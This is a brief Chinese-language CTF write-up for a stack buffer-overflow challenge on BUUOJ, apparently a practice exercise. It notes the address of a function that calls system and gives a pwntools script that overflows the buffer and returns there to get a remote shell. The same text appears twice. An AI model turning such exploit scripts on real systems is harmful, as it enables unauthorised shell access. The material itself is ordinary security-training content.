按tab键,看一下 fun函数 发现其地址是 0x401186;
但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行
from pwn import *
p = remote('node3.buuoj.cn', '25677')
payload = 'a' * (0xf + 8) + p64(0x40118A)
p.sendline(payload)
p.interactive()
按tab键,看一下 fun函数 发现其地址是 0x401186;
但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行
from pwn import *
p = remote('node3.buuoj.cn', '25677')
payload = 'a' * (0xf + 8) + p64(0x40118A)
p.sendline(payload)
p.interactive()